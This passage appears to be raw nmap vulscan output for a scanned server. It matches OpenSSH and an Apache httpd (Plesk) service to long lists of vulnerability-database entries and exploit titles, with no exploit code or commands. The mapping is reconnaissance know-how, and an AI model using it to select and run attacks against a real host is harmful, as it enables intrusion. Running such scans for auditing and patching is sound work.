3518| [2356] OpenSSH Private Key Authentication Check Vulnerability
3519| [1949] OpenSSH Client Unauthorized Remote Forwarding Vulnerability
3520| [1334] OpenSSH UseLogin Vulnerability
3521|
3522| IBM X-Force - https://exchange.xforce.ibmcloud.com:
3523| [83258] GSI-OpenSSH auth-pam.c security bypass
3524| [82781] OpenSSH time limit denial of service
3525| [82231] OpenSSH pam_ssh_agent_auth PAM code execution
3526| [74809] OpenSSH ssh_gssapi_parse_ename denial of service
3527| [72756] Debian openssh-server commands information disclosure
3528| [68339] OpenSSH pam_thread buffer overflow
3529| [67264] OpenSSH ssh-keysign unauthorized access
3530| [65910] OpenSSH remote_glob function denial of service
3531| [65163] OpenSSH certificate information disclosure
3532| [64387] OpenSSH J-PAKE security bypass
3533| [63337] Cisco Unified Videoconferencing OpenSSH weak security
3534| [46620] OpenSSH and multiple SSH Tectia products CBC mode information disclosure
3535| [45202] OpenSSH signal handler denial of service
3536| [44747] RHEL OpenSSH backdoor
3537| [44280] OpenSSH PermitRootLogin information disclosure
3538| [44279] OpenSSH sshd weak security
3539| [44037] OpenSSH sshd SELinux role unauthorized access
3540| [43940] OpenSSH X11 forwarding information disclosure
3541| [41549] OpenSSH ForceCommand directive security bypass
3542| [41438] OpenSSH sshd session hijacking
3543| [40897] OpenSSH known_hosts weak security
3544| [40587] OpenSSH username weak security
3545| [37371] OpenSSH username data manipulation
3546| [37118] RHSA update for OpenSSH privilege separation monitor authentication verification weakness not installed
3547| [37112] RHSA update for OpenSSH signal handler race condition not installed
3548| [37107] RHSA update for OpenSSH identical block denial of service not installed
3549| [36637] OpenSSH X11 cookie privilege escalation
3550| [35167] OpenSSH packet.c newkeys[mode] denial of service
3551| [34490] OpenSSH OPIE information disclosure
3552| [33794] OpenSSH ChallengeResponseAuthentication information disclosure
3553| [32975] Apple Mac OS X OpenSSH denial of service
3554| [32387] RHSA-2006:0738 updates for openssh not installed
3555| [32359] RHSA-2006:0697 updates for openssh not installed
3556| [32230] RHSA-2006:0298 updates for openssh not installed
3557| [32132] RHSA-2006:0044 updates for openssh not installed
3558| [30120] OpenSSH privilege separation monitor authentication verification weakness
3559| [29255] OpenSSH GSSAPI user enumeration
3560| [29254] OpenSSH signal handler race condition
3561| [29158] OpenSSH identical block denial of service
3562| [28147] Apple Mac OS X OpenSSH nonexistent user login denial of service
3563| [25116] OpenSSH OpenPAM denial of service
3564| [24305] OpenSSH SCP shell expansion command execution
3565| [22665] RHSA-2005:106 updates for openssh not installed
3566| [22117] OpenSSH GSSAPI allows elevated privileges
3567| [22115] OpenSSH GatewayPorts security bypass
3568| [20930] OpenSSH sshd.c LoginGraceTime denial of service
3569| [19441] Sun Solaris OpenSSH LDAP (1) client authentication denial of service
3570| [17213] OpenSSH allows port bouncing attacks
3571| [16323] OpenSSH scp file overwrite
3572| [13797] OpenSSH PAM information leak
3573| [13271] OpenSSH could allow an attacker to corrupt the PAM conversion stack
3574| [13264] OpenSSH PAM code could allow an attacker to gain access
3575| [13215] OpenSSH buffer management errors could allow an attacker to execute code
3576| [13214] OpenSSH memory vulnerabilities
3577| [13191] OpenSSH large packet buffer overflow
3578| [12196] OpenSSH could allow an attacker to bypass login restrictions
3579| [11970] OpenSSH could allow an attacker to obtain valid administrative account
3580| [11902] OpenSSH PAM support enabled information leak
3581| [9803] OpenSSH "
3582| [9763] OpenSSH downloaded from the OpenBSD FTP site or OpenBSD FTP mirror sites could contain a Trojan Horse
3583| [9307] OpenSSH is running on the system
3584| [9169] OpenSSH "
3585| [8896] OpenSSH Kerberos 4 TGT/AFS buffer overflow
3586| [8697] FreeBSD libutil in OpenSSH fails to drop privileges prior to using the login class capability database
3587| [8383] OpenSSH off-by-one error in channel code
3588| [7647] OpenSSH UseLogin option arbitrary code execution
3589| [7634] OpenSSH using sftp and restricted keypairs could allow an attacker to bypass restrictions
3590| [7598] OpenSSH with Kerberos allows attacker to gain elevated privileges
3591| [7179] OpenSSH source IP access control bypass
3592| [6757] OpenSSH "
3593| [6676] OpenSSH X11 forwarding symlink attack could allow deletion of arbitrary files
3594| [6084] OpenSSH 2.3.1 allows remote users to bypass authentication
3595| [5517] OpenSSH allows unauthorized access to resources
3596| [4646] OpenSSH UseLogin option allows remote users to execute commands as root
3597|
3598| Exploit-DB - https://www.exploit-db.com:
3599| [21579] OpenSSH 3.x Challenge-Response Buffer Overflow Vulnerabilities (2)
3600| [21578] OpenSSH 3.x Challenge-Response Buffer Overflow Vulnerabilities (1)
3601| [21402] OpenSSH 2.x/3.x Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
3602| [21314] OpenSSH 2.x/3.0.1/3.0.2 Channel Code Off-By-One Vulnerability
3603| [20253] OpenSSH 1.2 scp File Create/Overwrite Vulnerability
3604| [17462] FreeBSD OpenSSH 3.5p1 - Remote Root Exploit
3605| [14866] Novell Netware 6.5 - OpenSSH Remote Stack Overflow
3606| [6094] Debian OpenSSH Remote SELinux Privilege Elevation Exploit (auth)
3607| [3303] Portable OpenSSH <= 3.6.1p-PAM / 4.1-SUSE Timing Attack Exploit
3608| [2444] OpenSSH <= 4.3 p1 (Duplicated Block) Remote Denial of Service Exploit
3609| [1572] Dropbear / OpenSSH Server (MAX_UNAUTH_CLIENTS) Denial of Service
3610| [258] glibc-2.2 and openssh-2.3.0p1 exploits glibc => 2.1.9x
3611| [26] OpenSSH/PAM <= 3.6.1p1 Remote Users Ident (gossh.sh)
3612| [25] OpenSSH/PAM <= 3.6.1p1 Remote Users Discovery Tool
3613|
3614| OpenVAS (Nessus) - http://www.openvas.org:
3615| [902488] OpenSSH 'sshd' GSSAPI Credential Disclosure Vulnerability
3616| [900179] OpenSSH CBC Mode Information Disclosure Vulnerability
3617| [881183] CentOS Update for openssh CESA-2012:0884 centos6
3618| [880802] CentOS Update for openssh CESA-2009:1287 centos5 i386
3619| [880746] CentOS Update for openssh CESA-2009:1470 centos5 i386
3620| [870763] RedHat Update for openssh RHSA-2012:0884-04
3621| [870129] RedHat Update for openssh RHSA-2008:0855-01
3622| [861813] Fedora Update for openssh FEDORA-2010-5429
3623| [861319] Fedora Update for openssh FEDORA-2007-395
3624| [861170] Fedora Update for openssh FEDORA-2007-394
3625| [861012] Fedora Update for openssh FEDORA-2007-715
3626| [840345] Ubuntu Update for openssh vulnerability USN-597-1
3627| [840300] Ubuntu Update for openssh update USN-612-5
3628| [840271] Ubuntu Update for openssh vulnerability USN-612-2
3629| [840268] Ubuntu Update for openssh update USN-612-7
3630| [840259] Ubuntu Update for openssh vulnerabilities USN-649-1
3631| [840214] Ubuntu Update for openssh vulnerability USN-566-1
3632| [831074] Mandriva Update for openssh MDVA-2010:162 (openssh)
3633| [830929] Mandriva Update for openssh MDVA-2010:090 (openssh)
3634| [830807] Mandriva Update for openssh MDVA-2010:026 (openssh)
3635| [830603] Mandriva Update for openssh MDVSA-2008:098 (openssh)
3636| [830523] Mandriva Update for openssh MDVSA-2008:078 (openssh)
3637| [830317] Mandriva Update for openssh-askpass-qt MDKA-2007:127 (openssh-askpass-qt)
3638| [830191] Mandriva Update for openssh MDKSA-2007:236 (openssh)
3639| [802407] OpenSSH 'sshd' Challenge Response Authentication Buffer Overflow Vulnerability
3640| [103503] openssh-server Forced Command Handling Information Disclosure Vulnerability
3641| [103247] OpenSSH Ciphersuite Specification Information Disclosure Weakness
3642| [103064] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
3643| [100584] OpenSSH X Connections Session Hijacking Vulnerability
3644| [100153] OpenSSH CBC Mode Information Disclosure Vulnerability
3645| [66170] CentOS Security Advisory CESA-2009:1470 (openssh)
3646| [65987] SLES10: Security update for OpenSSH
3647| [65819] SLES10: Security update for OpenSSH
3648| [65514] SLES9: Security update for OpenSSH
3649| [65513] SLES9: Security update for OpenSSH
3650| [65334] SLES9: Security update for OpenSSH
3651| [65248] SLES9: Security update for OpenSSH
3652| [65218] SLES9: Security update for OpenSSH
3653| [65169] SLES9: Security update for openssh,openssh-askpass
3654| [65126] SLES9: Security update for OpenSSH
3655| [65019] SLES9: Security update for OpenSSH
3656| [65015] SLES9: Security update for OpenSSH
3657| [64931] CentOS Security Advisory CESA-2009:1287 (openssh)
3658| [61639] Debian Security Advisory DSA 1638-1 (openssh)
3659| [61030] Debian Security Advisory DSA 1576-2 (openssh)
3660| [61029] Debian Security Advisory DSA 1576-1 (openssh)
3661| [60840] FreeBSD Security Advisory (FreeBSD-SA-08:05.openssh.asc)
3662| [60803] Gentoo Security Advisory GLSA 200804-03 (openssh)
3663| [60667] Slackware Advisory SSA:2008-095-01 openssh
3664| [59014] Slackware Advisory SSA:2007-255-01 openssh
3665| [58741] Gentoo Security Advisory GLSA 200711-02 (openssh)
3666| [57919] Gentoo Security Advisory GLSA 200611-06 (openssh)
3667| [57895] Gentoo Security Advisory GLSA 200609-17 (openssh)
3668| [57585] Debian Security Advisory DSA 1212-1 (openssh (1:3.8.1p1-8.sarge.6))
3669| [57492] Slackware Advisory SSA:2006-272-02 openssh
3670| [57483] Debian Security Advisory DSA 1189-1 (openssh-krb5)
3671| [57476] FreeBSD Security Advisory (FreeBSD-SA-06:22.openssh.asc)
3672| [57470] FreeBSD Ports: openssh
3673| [56352] FreeBSD Security Advisory (FreeBSD-SA-06:09.openssh.asc)
3674| [56330] Gentoo Security Advisory GLSA 200602-11 (OpenSSH)
3675| [56294] Slackware Advisory SSA:2006-045-06 openssh
3676| [53964] Slackware Advisory SSA:2003-266-01 New OpenSSH packages
3677| [53885] Slackware Advisory SSA:2003-259-01 OpenSSH Security Advisory
3678| [53884] Slackware Advisory SSA:2003-260-01 OpenSSH updated again
3679| [53788] Debian Security Advisory DSA 025-1 (openssh)
3680| [52638] FreeBSD Security Advisory (FreeBSD-SA-03:15.openssh.asc)
3681| [52635] FreeBSD Security Advisory (FreeBSD-SA-03:12.openssh.asc)
3682| [11343] OpenSSH Client Unauthorized Remote Forwarding
3683| [10954] OpenSSH AFS/Kerberos ticket/token passing
3684| [10883] OpenSSH Channel Code Off by 1
3685| [10823] OpenSSH UseLogin Environment Variables
3686|
3687| SecurityTracker - https://www.securitytracker.com:
3688| [1028187] OpenSSH pam_ssh_agent_auth Module on Red Hat Enterprise Linux Lets Remote Users Execute Arbitrary Code
3689| [1026593] OpenSSH Lets Remote Authenticated Users Obtain Potentially Sensitive Information
3690| [1025739] OpenSSH on FreeBSD Has Buffer Overflow in pam_thread() That Lets Remote Users Execute Arbitrary Code
3691| [1025482] OpenSSH ssh-keysign Utility Lets Local Users Gain Elevated Privileges
3692| [1025028] OpenSSH Legacy Certificates May Disclose Stack Contents to Remote Users
3693| [1022967] OpenSSH on Red Hat Enterprise Linux Lets Remote Authenticated Users Gain Elevated Privileges
3694| [1021235] OpenSSH CBC Mode Error Handling May Let Certain Remote Users Obtain Plain Text in Certain Cases
3695| [1020891] OpenSSH on Debian Lets Remote Users Prevent Logins
3696| [1020730] OpenSSH for Red Hat Enterprise Linux Packages May Have Been Compromised
3697| [1020537] OpenSSH on HP-UX Lets Local Users Hijack X11 Sessions
3698| [1019733] OpenSSH Unsafe Default Configuration May Let Local Users Execute Arbitrary Commands
3699| [1019707] OpenSSH Lets Local Users Hijack Forwarded X Sessions in Certain Cases
3700| [1017756] Apple OpenSSH Key Generation Process Lets Remote Users Deny Service
3701| [1017183] OpenSSH Privilege Separation Monitor Validation Error May Cause the Monitor to Fail to Properly Control the Unprivileged Process
3702| [1016940] OpenSSH Race Condition in Signal Handler Lets Remote Users Deny Service and May Potentially Permit Code Execution
3703| [1016939] OpenSSH GSSAPI Authentication Abort Error Lets Remote Users Determine Valid Usernames
3704| [1016931] OpenSSH SSH v1 CRC Attack Detection Implementation Lets Remote Users Deny Service
3705| [1016672] OpenSSH on Mac OS X Lets Remote Users Deny Service
3706| [1015706] OpenSSH Interaction With OpenPAM Lets Remote Users Deny Service
3707| [1015540] OpenSSH scp Double Shell Character Expansion During Local-to-Local Copying May Let Local Users Gain Elevated Privileges in Certain Cases
3708| [1014845] OpenSSH May Unexpectedly Activate GatewayPorts and Also May Disclose GSSAPI Credentials in Certain Cases
3709| [1011193] OpenSSH scp Directory Traversal Flaw Lets Remote SSH Servers Overwrite Files in Certain Cases
3710| [1011143] OpenSSH Default Configuration May Be Unsafe When Used With Anonymous SSH Services
3711| [1007791] Portable OpenSSH PAM free() Bug May Let Remote Users Execute Root Code
3712| [1007716] OpenSSH buffer_append_space() and Other Buffer Management Errors May Let Remote Users Execute Arbitrary Code
3713| [1006926] OpenSSH Host Access Restrictions Can Be Bypassed By Remote Users
3714| [1006688] OpenSSH Timing Flaw With Pluggable Authentication Modules Can Disclose Valid User Account Names to Remote Users
3715| [1004818] OpenSSH's Secure Shell (SSH) Implementation Weakness May Disclose User Passwords to Remote Users During Man-in-the-Middle Attacks
3716| [1004616] OpenSSH Integer Overflow and Buffer Overflow May Allow Remote Users to Gain Root Access to the System
3717| [1004391] OpenSSH 'BSD_AUTH' Access Control Bug May Allow Unauthorized Remote Users to Authenticated to the System
3718| [1004115] OpenSSH Buffer Overflow in Kerberos Ticket and AFS Token Processing Lets Local Users Execute Arbitrary Code With Root Level Permissions
3719| [1003758] OpenSSH Off-by-one 'Channels' Bug May Let Authorized Remote Users Execute Arbitrary Code with Root Privileges
3720| [1002895] OpenSSH UseLogin Environment Variable Bug Lets Local Users Execute Commands and Gain Root Access
3721| [1002748] OpenSSH 3.0 Denial of Service Condition May Allow Remote Users to Crash the sshd Daemon and KerberosV Configuration Error May Allow Remote Users to Partially Authenticate When Authentication Should Not Be Permitted
3722| [1002734] OpenSSH's S/Key Implementation Information Disclosure Flaw Provides Remote Users With Information About Valid User Accounts
3723| [1002455] OpenSSH May Fail to Properly Restrict IP Addresses in Certain Configurations
3724| [1002432] OpenSSH's Sftp-server Subsystem Lets Authorized Remote Users with Restricted Keypairs Obtain Additional Access on the Server
3725| [1001683] OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies
3726|
3727| OSVDB - http://www.osvdb.org:
3728| [92034] GSI-OpenSSH auth-pam.c Memory Management Authentication Bypass
3729| [90474] Red Hat / Fedora PAM Module for OpenSSH Incorrect error() Function Calling Local Privilege Escalation
3730| [90007] OpenSSH logingracetime / maxstartup Threshold Connection Saturation Remote DoS
3731| [81500] OpenSSH gss-serv.c ssh_gssapi_parse_ename Function Field Length Value Parsing Remote DoS
3732| [78706] OpenSSH auth-options.c sshd auth_parse_options Function authorized_keys Command Option Debug Message Information Disclosure
3733| [75753] OpenSSH PAM Module Aborted Conversation Local Information Disclosure
3734| [75249] OpenSSH sftp-glob.c remote_glob Function Glob Expression Parsing Remote DoS
3735| [75248] OpenSSH sftp.c process_put Function Glob Expression Parsing Remote DoS
3736| [72183] Portable OpenSSH ssh-keysign ssh-rand-helper Utility File Descriptor Leak Local Information Disclosure
3737| [70873] OpenSSH Legacy Certificates Stack Memory Disclosure
3738| [69658] OpenSSH J-PAKE Public Parameter Validation Shared Secret Authentication Bypass
3739| [67743] Novell NetWare OpenSSH SSHD.NLM Absolute Path Handling Remote Overflow
3740| [59353] OpenSSH sshd Local TCP Redirection Connection Masking Weakness
3741| [58495] OpenSSH sshd ChrootDirectory Feature SetUID Hard Link Local Privilege Escalation
3742| [56921] OpenSSH Unspecified Remote Compromise
3743| [53021] OpenSSH on ftp.openbsd.org Trojaned Distribution
3744| [50036] OpenSSH CBC Mode Chosen Ciphertext 32-bit Chunk Plaintext Context Disclosure
3745| [49386] OpenSSH sshd TCP Connection State Remote Account Enumeration
3746| [48791] OpenSSH on Debian sshd Crafted Username Arbitrary Remote SELinux Role Access
3747| [47635] OpenSSH Packages on Red Hat Enterprise Linux Compromised Distribution
3748| [47227] OpenSSH X11UseLocalhost X11 Forwarding Port Hijacking
3749| [45873] Cisco WebNS SSHield w/ OpenSSH Crafted Large Packet Remote DoS
3750| [43911] OpenSSH ~/.ssh/rc ForceCommand Bypass Arbitrary Command Execution
3751| [43745] OpenSSH X11 Forwarding Local Session Hijacking
3752| [43371] OpenSSH Trusted X11 Cookie Connection Policy Bypass
3753| [39214] OpenSSH linux_audit_record_event Crafted Username Audit Log Injection
3754| [37315] pam_usb OpenSSH Authentication Unspecified Issue
3755| [34850] OpenSSH on Mac OS X Key Generation Remote Connection DoS
3756| [34601] OPIE w/ OpenSSH Account Enumeration
3757| [34600] OpenSSH S/KEY Authentication Account Enumeration
3758| [32721] OpenSSH Username Password Complexity Account Enumeration
3759| [30232] OpenSSH Privilege Separation Monitor Weakness
3760| [29494] OpenSSH packet.c Invalid Protocol Sequence Remote DoS
3761| [29266] OpenSSH GSSAPI Authentication Abort Username Enumeration
3762| [29264] OpenSSH Signal Handler Pre-authentication Race Condition Code Execution
3763| [29152] OpenSSH Identical Block Packet DoS
3764| [27745] Apple Mac OS X OpenSSH Nonexistent Account Login Enumeration DoS
3765| [23797] OpenSSH with OpenPAM Connection Saturation Forked Process Saturation DoS
3766| [22692] OpenSSH scp Command Line Filename Processing Command Injection
3767| [20216] OpenSSH with KerberosV Remote Authentication Bypass
3768| [19142] OpenSSH Multiple X11 Channel Forwarding Leaks
3769| [19141] OpenSSH GSSAPIAuthentication Credential Escalation
3770| [18236] OpenSSH no pty Command Execution Local PAM Restriction Bypass
3771| [16567] OpenSSH Privilege Separation LoginGraceTime DoS
3772| [16039] Solaris 108994 Series Patch OpenSSH LDAP Client Authentication DoS
3773| [9562] OpenSSH Default Configuration Anon SSH Service Port Bounce Weakness
3774| [9550] OpenSSH scp Traversal Arbitrary File Overwrite
3775| [6601] OpenSSH *realloc() Unspecified Memory Errors
3776| [6245] OpenSSH SKEY/BSD_AUTH Challenge-Response Remote Overflow
3777| [6073] OpenSSH on FreeBSD libutil Arbitrary File Read
3778| [6072] OpenSSH PAM Conversation Function Stack Modification
3779| [6071] OpenSSH SSHv1 PAM Challenge-Response Authentication Privilege Escalation
3780| [5536] OpenSSH sftp-server Restricted Keypair Restriction Bypass
3781| [5408] OpenSSH echo simulation Information Disclosure
3782| [5113] OpenSSH NIS YP Netgroups Authentication Bypass
3783| [4536] OpenSSH Portable AIX linker Privilege Escalation
3784| [3938] OpenSSL and OpenSSH /dev/random Check Failure
3785| [3456] OpenSSH buffer_append_space() Heap Corruption
3786| [2557] OpenSSH Multiple Buffer Management Multiple Overflows
3787| [2140] OpenSSH w/ PAM Username Validity Timing Attack
3788| [2112] OpenSSH Reverse DNS Lookup Bypass
3789| [2109] OpenSSH sshd Root Login Timing Side-Channel Weakness
3790| [1853] OpenSSH Symbolic Link 'cookies' File Removal
3791| [839] OpenSSH PAMAuthenticationViaKbdInt Challenge-Response Remote Overflow
3792| [781] OpenSSH Kerberos TGT/AFS Token Passing Remote Overflow
3793| [730] OpenSSH Channel Code Off by One Remote Privilege Escalation
3794| [688] OpenSSH UseLogin Environment Variable Local Command Execution
3795| [642] OpenSSH Multiple Key Type ACL Bypass
3796| [504] OpenSSH SSHv2 Public Key Authentication Bypass
3797| [341] OpenSSH UseLogin Local Privilege Escalation
3798|_
80/tcp open http Apache httpd (PleskLin)
3800|_http-server-header: Apache
3801| vulscan: VulDB - https://vuldb.com:
3802| [141649] Apache OFBiz up to 16.11.05 Form Widget Freemarker Markup Code Execution
3803| [141648] Apache OFBiz up to 16.11.05 Application Stored cross site scripting
3804| [140386] Apache Commons Beanutils 1.9.2 BeanIntrospector unknown vulnerability
3805| [139708] Apache Ranger up to 1.2.0 Policy Import cross site scripting
3806| [139540] cPanel up to 60.0.24 Apache HTTP Server Key information disclosure
3807| [139386] Apache Tike up to 1.21 RecursiveParserWrapper Stack-based memory corruption
3808| [139385] Apache Tika 1.19/1.20/1.21 SAXParsers Hang denial of service
3809| [139384] Apache Tika up to 1.21 RecursiveParserWrapper ZIP File denial of service
3810| [139261] Apache Solr 8.2.0 DataImportHandler Parameter unknown vulnerability
3811| [139259] cPanel up to 68.0.26 WHM Apache Includes Editor information disclosure
3812| [139256] cPanel up to 68.0.26 WHM Apache Configuration Include Editor cross site scripting
3813| [139239] cPanel up to 70.0.22 Apache HTTP Server Log information disclosure
3814| [139141] Apache ActiveMQ Client up to 5.15.4 ActiveMQConnection.java ActiveMQConnection denial of service
3815| [139130] cPanel up to 73.x Apache HTTP Server Injection privilege escalation
3816| [138914] Venustech Apache VCL 2.1/2.2/2.3/2.4/2.5 VM sql injection
3817| [138913] Venustech Apache VCL 2.1/2.2/2.3/2.4/2.5 Block Argument privilege escalation
3818| [138912] Venustech Apache VCL 2.1/2.2/2.3/2.4/2.5 Cookie sql injection
3819| [138816] Apache Storm up to 1.2.2 Logviewer Daemon Log information disclosure
3820| [138815] Apache Storm up to 1.2.2 UI Daemon Deserialization privilege escalation
3821| [138164] Oracle 2.7.0.1 Apache Log4j unknown vulnerability
3822| [138155] Oracle Agile Engineering Data Management 6.2.0/6.2.1 Apache Tomcat unknown vulnerability
3823| [138151] Oracle Transportation Management 6.3.7 Apache Tomcat unknown vulnerability
3824| [138149] Oracle Agile Engineering Data Management 6.2.0/6.2.1 Apache Commons FileUpload unknown vulnerability
3825| [138131] Oracle MICROS Retail XBRi Loss Prevention 10.8.0/10.8.1/10.8.2/10.8.3 Apache Tomcat unknown vulnerability
3826| [138129] Oracle Retail Xstore Point of Service 7.0/7.1 Apache HTTP Server denial of service
3827| [138123] Oracle Retail Order Management System 5.0 Apache Struts 1 unknown vulnerability
3828| [138122] Oracle Retail Order Broker 5.2/15.0 Apache Tomcat unknown vulnerability
3829| [138121] Oracle Retail Order Broker 5.2/15.0 Apache CXF unknown vulnerability
3830| [138112] Oracle Retail Integration Bus 15.0/16.0 Apache Commons FileUpload unknown vulnerability
3831| [138111] Oracle MICROS Retail XBRi Loss Prevention 10.8.0/10.8.1/10.8.2/10.8.3 Apache Commons FileUpload unknown vulnerability
3832| [138103] Oracle PeopleSoft Enterprise PeopleTools 8.55/8.56/8.57 Apache WSS4J information disclosure
3833| [138053] Oracle JD Edwards EnterpriseOne Tools 9.2 Apache Log4j unknown vulnerability
3834| [138036] Oracle Insurance Rules Palette 10.0/10.1/10.2/11.0 Apache Commons FileUpload unknown vulnerability
3835| [138035] Oracle Insurance Policy Administration J2EE 10.0/10.1/10.2/11.0 Apache Commons FileUpload unknown vulnerability
3836| [138034] Oracle Insurance Calculation Engine 9.7/10.0/10.1/10.2 Apache Commons FileUpload unknown vulnerability
3837| [138028] Oracle Identity Manager 11.1.2.3.0/12.2.1.3.0 Apache Log4j unknown vulnerability
3838| [138020] Oracle BI Publisher 11.1.1.9.0 Apache Tomcat unknown vulnerability
3839| [138019] Oracle BI Publisher (formerly XML Publisher) 11.1.1.9.0 Apache Tomcat unknown vulnerability
3840| [138017] Oracle Outside In Technology 8.5.4 Apache Commons FileUpload unknown vulnerability
3841| [138013] Oracle Outside In Technology 8.5.4 Apache Tomcat unknown vulnerability
3842| [138012] Oracle Outside In Technology 8.5.4 Apache HTTP Server unknown vulnerability
3843| [138009] Oracle Outside In Technology 8.5.4 Apache HTTP Server unknown vulnerability
3844| [138008] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0 Apache Struts 1 denial of service
3845| [138007] Oracle WebCenter Sites 12.2.1.3.0 Apache Tomcat denial of service
3846| [138006] Oracle Enterprise Repository 12.1.3.0.0 Apache CXF denial of service
3847| [138000] Oracle WebCenter Sites 12.2.1.3.0 Apache Commons FileUpload unknown vulnerability
3848| [137999] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0 Apache Commons FileUpload unknown vulnerability
3849| [137995] Oracle Hospitality Simphony 18.2.1 Apache WSS4J information disclosure
3850| [137987] Oracle FLEXCUBE Universal Banking up to 12.0.3/12.4.0/14.2.0 Apache Log4j unknown vulnerability
3851| [137981] Oracle Insurance IFRS 17 Analyzer 8.0.6/8.0.7 Apache Commons FileUpload unknown vulnerability
3852| [137980] Oracle Insurance Data Foundation 8.0.4/8.0.5/8.0.6/8.0.7 Apache Commons FileUpload unknown vulnerability
3853| [137979] Oracle 8.0.8 Apache Commons FileUpload unknown vulnerability
3854| [137973] Oracle 8.0.4/8.0.5/8.0.6/8.0.7 Apache Batik unknown vulnerability
3855| [137970] Oracle Financial Services Profitability Management 8.0.4/8.0.5/8.0.6/8.0.7 Apache ActiveMQ unknown vulnerability
3856| [137967] Oracle up to 8.0.7 Apache httpd unknown vulnerability
3857| [137966] Oracle 8.0.7/8.0.8 Apache Groovy unknown vulnerability
3858| [137965] Oracle Financial Services Liquidity Risk Management 8.0.1/8.0.2/8.0.4/8.0.5/8.0.6 Apache Commons FileUpload unknown vulnerability
3859| [137964] Oracle 8.0.4/8.0.5/8.0.6/8.0.7 Apache Log4j unknown vulnerability
3860| [137933] Oracle Banking Platform up to 2.7.1 Apache Tika unknown vulnerability
3861| [137926] Oracle Enterprise Manager for Fusion Middleware 13.2/13.3 Apache Commons FileUpload information disclosure
3862| [137924] Oracle Enterprise Manager Base Platform 12.1.0.5.0/13.2.0.0.0/13.3.0.0.0 Apache Commons FileUpload unknown vulnerability
3863| [137914] Oracle E-Business Suite up to 12.2.8 Apache ActiveMQ unknown vulnerability
3864| [137913] Oracle E-Business Suite up to 12.2.8 Apache ActiveMQ unknown vulnerability
3865| [137911] Oracle E-Business Suite up to 12.2.8 Apache HTTP Server unknown vulnerability
3866| [137910] Oracle E-Business Suite up to 12.2.8 Apache CXF information disclosure
3867| [137909] Oracle E-Business Suite up to 12.2.8 Apache Commons FileUpload unknown vulnerability
3868| [137905] Oracle Primavera Gateway 15.2/16.2/17.12/18.8 Apache Tika denial of service
3869| [137901] Oracle Primavera Unifier up to 18.8 Apache HTTP Server unknown vulnerability
3870| [137895] Oracle Instant Messaging Server 10.0.1.2.0 Apache Tika information disclosure
3871| [137894] Oracle EAGLE (Software) 46.5/46.6/46.7 Apache Tomcat information disclosure
3872| [137892] Oracle Online Mediation Controller 6.1 Apache Batik denial of service
3873| [137891] Oracle Interactive Session Recorder 6.0/6.1/6.2 Apache Tomcat unknown vulnerability
3874| [137885] Oracle Diameter Signaling Router (DSR) 8.0/8.1/8.2 Apache cxf unknown vulnerability
3875| [137882] Oracle Unified 8.0.0.2.0 Apache Commons FileUpload unknown vulnerability
3876| [137881] Oracle Online Mediation Controller 6.1 Apache Commons FileUpload unknown vulnerability
3877| [137880] Oracle Interactive Session Recorder 6.0/6.1/6.2 Apache Log4j unknown vulnerability
3878| [137879] Oracle Convergence 3.0.2 Apache Commons FileUpload unknown vulnerability
3879| [137876] Oracle Application Session Controller 3.7.1/3.8.0 Apache Commons FileUpload unknown vulnerability
3880| [137829] Apache Roller 5.2.3 Math Comment Authenticator Reflected cross site scripting
3881| [137736] Apache Kafka 0.11.0.0/2.1.0 ACL Validation Request privilege escalation
3882| [136858] MakerBot Replicator 5G Printer Apache HTTP Server information disclosure
3883| [136849] Analogic Poste.io 2.1.6 on Apache RoundCube logs/ information disclosure
3884| [136822] Apache Tomcat up to 8.5.40/9.0.19 Incomplete Fix CVE-2019-0199 Resource Exhaustion denial of service
3885| [136808] Apache Geode up to 1.8.0 Secure Mode privilege escalation
3886| [136646] Apache Allura up to 1.10.x Dropdown Selector Stored cross site scripting
3887| [136374] Apache HTTP Server up to 2.4.38 Slash Regular Expression unknown vulnerability
3888| [136373] Apache HTTP Server 2.4.34/2.4.35/2.4.36/2.4.37/2.4.38 HTTP2 Request Crash denial of service
3889| [136372] Apache HTTP Server up to 2.4.38 HTTP2 Request unknown vulnerability
3890| [136370] Apache Fineract up to 1.2.x sql injection
3891| [136369] Apache Fineract up to 1.2.x sql injection
3892| [135731] Apache Hadoop up to 2.8.4/2.9.1/3.1.0 yarn privilege escalation
3893| [135664] Apache Tomcat up to 7.0.93/8.5.39/9.0.0.17 SSI printenv Command cross site scripting
3894| [135663] Apache Camel up to 2.23.x JSON-lib Library XML Data XML External Entity
3895| [135661] Apache Roller up to 5.2.1/5.2.0 XML-RPC Interface XML File Server-Side Request Forgery
3896| [135402] Apache Zookeeper up to 3.4.13/3.5.0-alpha to 3.5.4-beta getACL() information disclosure
3897| [135270] Apache JSPWiki up to 2.11.0.M3 Plugin Link cross site scripting
3898| [135269] Apache JSPWiki up to 2.11.0.M3 InterWiki Link cross site scripting
3899| [135268] Apache JSPWiki up to 2.11.0.M3 Attachment cross site scripting
3900| [134527] Apache Karaf up to 4.2.4 Config Service directory traversal
3901| [134416] Apache Sanselan 0.97-incubator Loop denial of service
3902| [134415] Apache Sanselan 0.97-incubator Hang denial of service
3903| [134291] Apache Axis up to 1.7.8 Server-Side Request Forgery
3904| [134290] Apache UIMA DUCC up to 2.2.2 cross site scripting
3905| [134248] Apache Archiva up to 2.2.3 Artifact Upload directory traversal
3906| [134247] Apache Archiva up to 2.2.3 Artifact Upload directory traversal
3907| [134246] Apache Camel up to 2.19/2.21.3/2.22.2/2.23.0 directory traversal
3908| [134138] Apache Pluto 3.0.0/3.0.1 Chat Room Demo Portlet cross site scripting
3909| [133992] Apache Qpid Proton up to 0.27.0 Certificate Validation Man-in-the-Middle weak authentication
3910| [133977] Apache Zeppelin up to 0.7.x Stored cross site scripting
3911| [133976] Apache Zeppelin up to 0.7.x Cron Scheduler privilege escalation
3912| [133975] Apache Zeppelin up to 0.7.2 Session Fixation weak authentication
3913| [133444] Apache PDFbox 2.0.14 XML Parser XML External Entity
3914| [133573] Oracle FLEXCUBE Private Banking 2.0.0.0/2.2.0.1/12.0.1.0/12.0.3.0/12.1.0.0 Apache ActiveMQ unknown vulnerability
3915| [133407] Apache Tomcat up to 7.0.93/8.5.39/9.0.17 on Windows JRE Command Line Argument Code Execution
3916| [133315] Apache Airflow up to 1.10.2 HTTP Endpoint cross site request forgery
